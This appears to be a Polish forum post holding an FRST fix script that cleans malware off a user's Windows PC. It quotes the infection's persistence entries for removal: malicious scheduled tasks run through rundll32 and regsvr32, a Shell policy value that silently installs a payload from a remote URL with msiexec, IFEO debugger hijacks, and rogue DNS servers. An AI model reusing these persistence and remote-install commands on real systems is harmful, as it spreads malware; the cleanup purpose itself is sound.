CHR res: Zainfekowany resources.pak (search_engine). Przeinstaluj Chrome. <==== UWAGA
Task: {2B5536CD-9451-4B67-AFF2-8C189FDCF1C3} - System32\Tasks\JacekNarrowestLegerV2 => rundll32.exe DaytimesMeting.dll,main 7 1 <==== UWAGA
Task: {4D68DE6E-403E-41B9-93C0-09116DD845B8} - System32\Tasks\{0A6C2420-4179-0F5F-50B7-87BD0DD02B51} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\13924212\3af3e170.dll" <==== UWAGA
Task: {B06B3CCF-1917-4A83-9BB7-FF15573F96EB} - System32\Tasks\{5F308FC6-E89B-386D-1021-CDAED3975E19} => C:\ProgramData\{0E997F63-B932-C8C8-8193-EAE756FC51FF}\50D34211-E778-F5BA-CAE7-75CA06B77D84.exe <==== UWAGA
RemoveDirectory: C:\PROGRA~3\13924212
RemoveDirectory: C:\ProgramData\{0E997F63-B932-C8C8-8193-EAE756FC51FF}
RemoveDirectory: C:\Program Files (x86)\HPZebra
DeleteKey: HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => -> Brak pliku
C:\Users\Jacek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr (64-bit).lnk
C:\Users\Jacek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk
C:\Users\Jacek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехрlоrеr (Nо Аdd-оns).lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
HKU\S-1-5-21-3726324006-2712766758-2150849850-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8xMWU5M8EdNjzYNkFxFTY4F8MdRTlYNUY3RTMdOTH1MF== /q <==== UWAGA
HKU\S-1-5-21-3726324006-2712766758-2150849850-1000\...\Policies\Explorer: []
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
Tcpip\..\Interfaces\{FB7E2058-C2D6-44B7-84C2-C309D9726189}: [DhcpNameServer] 82.163.143.176
Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178
SearchScopes: HKU\S-1-5-80-1676156165-341244942-2512523162-2119369437-1089443375 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-80-789327992-547749573-3960799038-3129106254-1178826544 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: IObit Ads Removal -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files (x86)\IObit\IObit Malware Fighter\Surfing Protection\Adblock\Adblock.dll => Brak pliku
FF user.js: detected! => C:\Users\Jacek\AppData\Roaming\Mozilla\Firefox\Profiles\00eme7yc.default-1497867851744\user.js [2017-05-10]
S3 catchme; Brak ImagePath
S2 First; Brak ImagePath
C:\Windows\Minidump\*.dmp
C:\Users\Jacek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Jacek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk
EmptyTemp:
C:\Users\Jacek\Desktop\sem 7\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\FairPlay License.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\AFPL License.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDFCreator\Licenses\GPL License.lnk
SearchScopes: HKU\S-1-5-80-2637565795-2436600752-3222017972-1938484727-915996726 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Użytkownicy przeglądający to forum: Brak zarejestrowanych użytkowników oraz 9 gości